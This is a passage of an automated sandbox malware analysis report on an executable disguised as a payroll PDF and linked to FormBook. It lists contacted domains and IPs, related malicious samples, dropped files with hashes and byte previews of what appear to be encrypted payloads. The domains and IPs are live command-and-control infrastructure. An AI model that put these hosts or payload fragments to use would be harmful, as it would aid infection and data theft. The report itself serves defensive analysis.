https://static.loopia.se/responsive/styles/reset.css	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-57.png	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	clip.exe, 00000004.00000002.4608397493.0000000006106000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000044C6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	clip.exe, 00000004.00000002.4608397493.00000000065BC000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.000000000497C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc	WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4608986123.0000000005781000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	clip.exe, 00000004.00000002.4610235911.0000000007A7E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/stats.png	clip.exe, 00000004.00000002.4608397493.0000000006298000.00000004.10000000.00040000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.0000000004658000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	clip.exe, 00000004.00000002.4608397493.0000000005DE2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4610146783.00000000077D0000.00000004.00000800.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000002.4607187939.00000000041A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.251.54.212	www.anuts.top	United States	62468	VPSQUANUS	false
172.67.210.102	www.dmtxwuatbz.cc	United States	13335	CLOUDFLARENETUS	false
213.145.228.16	www.sandranoll.com	Austria	25575	DOMAINTECHNIKAT	false
194.9.94.85	www.xn--matfrmn-jxa4m.se	Sweden	39570	LOOPIASE	false
5.44.111.162	www.hprlz.cz	Germany	45031	PROVIDERBOXIPv4IPv6DUS1DE	false
217.160.0.106	www.catherineviskadi.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
208.91.197.27	www.bfiworkerscomp.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
194.58.112.174	www.helpers-lion.online	Russian Federation	197695	AS-REGRU	false
199.192.19.19	www.telwisey.info	United States	22612	NAMECHEAP-NETUS	false
43.252.167.188	www.xn--fhq1c541j0zr.com	Hong Kong	38277	CLINK-AS-APCommuniLinkInternetLimitedHK	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1490395
Start date and time:	2024-08-09 08:39:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PAYROLL SUMMARY _pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@15/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 49 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WsLcnyccsDHmlxczMuydOvvxEH.exe, PID 5916 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:40:58	API Interceptor	11440046x Sleep call for process: clip.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.251.54.212	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/d5fo/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/li0t/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/
	BL7247596940.pdf.exe	Get hash	malicious	FormBook	Browse	www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
	Arrival Notice.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.anuts.top/niik/
172.67.210.102	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
172.67.210.102	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.dmtxwuatbz.cc/lfkn/
213.145.228.16	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	strg.or.at/wordpress/wp-login.php
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/zg5v/
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/cga5/
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sandranoll.com/4bud/
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/niik/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dmtxwuatbz.cc	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Attendance list.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Swift Copy #U00a362,271.03.Pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	PO-104678522.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	NEW ORDER-RFQ#10112023Q4.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
	NEW ORDER 75647839384.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
www.sandranoll.com	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.145.228.16
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	PO.4563.0002_2024.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
www.anuts.top	LisectAVT_2403002B_466.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Attendance list.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	2OdHcYtYOMOepjD.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Tekstlinie.vbs	Get hash	malicious	FormBook, GuLoader	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	dMY6QiHAIpPPqiV.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Purchase order.pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
www.xn--matfrmn-jxa4m.se	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	D7KV2Z73zC.rtf	Get hash	malicious	FormBook	Browse	194.9.94.85
	Scan Doc.docx.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	New Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
www.catherineviskadi.com	docs_pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	Attendance list.exe	Get hash	malicious	FormBook	Browse	217.160.0.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DOMAINTECHNIKAT	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	1LZvA2cEfV.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.145.228.16
	Payment Details- scanslip000002343.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	DRAFT DOCS RSHA25491003.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Payment_Advice.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
CLOUDFLARENETUS	SecuriteInfo.com.Win32.PWSX-gen.5215.298.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	GMT20240809-Ahorramas-46C1917AED8399884827241723747824.htm	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	corpsero.exe	Get hash	malicious	Unknown	Browse	104.18.32.86
	SecuriteInfo.com.Win32.PWSX-gen.2282.26838.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://managemyreff.top/pay	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	y9FV0fUD62.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	y9FV0fUD62.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	RFQ# 10925.pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	(CBX).exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	f76b2b03f3bcae16946cc4df5c6e8f0c960c415c38279a170e2dbf9ebcbd31f7_dump.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
VPSQUANUS	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	1.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
	bot.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.175
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.175
	bot.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.175
PROVIDERBOXIPv4IPv6DUS1DE	RAbSVWi6Lh.elf	Get hash	malicious	Mirai	Browse	91.206.143.156
	Yb6ztdvQaB.elf	Get hash	malicious	Unknown	Browse	93.90.186.36
	5Jan3SztHt.elf	Get hash	malicious	Unknown	Browse	5.44.126.238
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	Attendance list.exe	Get hash	malicious	FormBook	Browse	5.44.111.162
	62c.js	Get hash	malicious	Unknown	Browse	5.44.111.28
	62c.js	Get hash	malicious	Unknown	Browse	5.44.111.28
	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	5.44.111.104
	JJUmnnkIxSCyKik.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	93.90.186.43
LOOPIASE	http://tok2np0cklt.top/	Get hash	malicious	Unknown	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	ORDER TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.85

Process:	C:\Windows\SysWOW64\clip.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut6A00.tmp

Download File

Process:	C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993414347133746
Encrypted:	true
SSDEEP:	6144:3dZAiSB6pqjpFIoyBj1ufvERQrWlj8/4HUdJcLftT1CGtxkaqG/2U:3dZxrSs1m8mrWljQ4HUD8ftT1Vtx5n/p
MD5:	D1BB2BF4B043FA2F4C443D84D3B068F5
SHA1:	D9BD381828FFDE2D8FB1F87EA8C46D7396FB86D6
SHA-256:	504E208EF6F9CA096B5B63D2A9E48AB4ACAAA97442BF03AF7DEAC6E54D1DC6D4
SHA-512:	E21CB2D6BA4922EC27D4451BAAB7EE78BBF8448143217FCC10B39572532E431AC5A6415A117D98BEC98E0A0008D03742DAEB0485AD636907037E207E06E43EF1
Malicious:	false
Reputation:	low
Preview:	.....X5HDm.J..o.5K...}@Q...SX5HD5OUCYGNWSX5HD5OUCYGNWSX5H.5OUMF.@W.Q.i.4..b./'$s(G'#G.8c:& 9<,.*!.= -y. w..fh)Z+0mTJDsSX5HD5O,BP.s74..(#.r5$.]...bU/./...e').I...xU(..0$&j3?.HD5OUCYG..SXyIE5^.{9GNWSX5HD.OWBRFEWSH1HD5OUCYGNwFX5HT5OUc]GNW.X5XD5OWCYANWSX5HD3OUCYGNWSx1HD7OUCYGNUS..HD%OUSYGNWCX5XD5OUCYWNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNy'=M<D5O.L]GNGSX5X@5OECYGNWSX5HD5OUCyGN7SX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OU

C:\Users\user\AppData\Local\Temp\aut6A3F.tmp

Download File

Process:	C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	9740
Entropy (8bit):	7.624738957644123
Encrypted:	false
SSDEEP:	192:CZIUd0cGw1zWEtGbIn+XmqvCYlDU8UdOFZWV97Qxo0uZB:Yd0bWWEtiq+X/CDD84o/kB
MD5:	CFA3777AA0C2CB0E6923D351BB5E4236
SHA1:	D86AACD281B0743A1BB2688CDF0E735998CF89E1
SHA-256:	4505BE2746BB743662C604C7AB94C53E85AC927853899763D3C58A1D7A1EFFA4
SHA-512:	599FA4EFAC46A09B66E284D0585E64E8E6DB582C333095A086890EC98D17DDC18539025FA5DB6CBD33DACE02E04EE5610DB5610F864D4F84C31B3160C14DD955
Malicious:	false
Reputation:	low
Preview:	EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........\|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3\|vY..G.6.Yf.8_..oe..i\|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...

C:\Users\user\AppData\Local\Temp\emboweling

Download File

Process:	C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe
File Type:	FGDC-STD-001-1998
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.578836659186228
Encrypted:	false
SSDEEP:	384:gAQKy7bFwQ4/6BmsM6IYj8R250duwlRcL02TqOIdsVHfGbLph1juTJOtHtiP:PQKM1GsMMIADo2TMdshGbLph1jXtAP
MD5:	EB91642CCC7DE7EA5CB558EAB2CD9E0A
SHA1:	4372B48DC0161275CEFD05F8FABF5DF2CD3C40B5
SHA-256:	BDEAD04BDD0426994305540AA15B0969F2836B18056AC7019D219CFD89D088D3
SHA-512:	F2D304FB2516E5FF2F60A2F2CCFABFD463A8572072F6F2372B27F09ACB82A192F8DAB6CDE196E55A8F063CCD6F6342DF15A565DAB14418D2DFA67A470E01DE0A
Malicious:	false
Reputation:	low
Preview:	2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:

C:\Users\user\AppData\Local\Temp\overfertilize

Download File

Process:	C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993414347133746
Encrypted:	true
SSDEEP:	6144:3dZAiSB6pqjpFIoyBj1ufvERQrWlj8/4HUdJcLftT1CGtxkaqG/2U:3dZxrSs1m8mrWljQ4HUD8ftT1Vtx5n/p
MD5:	D1BB2BF4B043FA2F4C443D84D3B068F5
SHA1:	D9BD381828FFDE2D8FB1F87EA8C46D7396FB86D6
SHA-256:	504E208EF6F9CA096B5B63D2A9E48AB4ACAAA97442BF03AF7DEAC6E54D1DC6D4
SHA-512:	E21CB2D6BA4922EC27D4451BAAB7EE78BBF8448143217FCC10B39572532E431AC5A6415A117D98BEC98E0A0008D03742DAEB0485AD636907037E207E06E43EF1
Malicious:	false
Reputation:	low
Preview:	.....X5HDm.J..o.5K...}@Q...SX5HD5OUCYGNWSX5HD5OUCYGNWSX5H.5OUMF.@W.Q.i.4..b./'$s(G'#G.8c:& 9<,.*!.= -y. w..fh)Z+0mTJDsSX5HD5O,BP.s74..(#.r5$.]...bU/./...e').I...xU(..0$&j3?.HD5OUCYG..SXyIE5^.{9GNWSX5HD.OWBRFEWSH1HD5OUCYGNwFX5HT5OUc]GNW.X5XD5OWCYANWSX5HD3OUCYGNWSx1HD7OUCYGNUS..HD%OUSYGNWCX5XD5OUCYWNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNy'=M<D5O.L]GNGSX5X@5OECYGNWSX5HD5OUCyGN7SX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OUCYGNWSX5HD5OU

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.2272101091532175
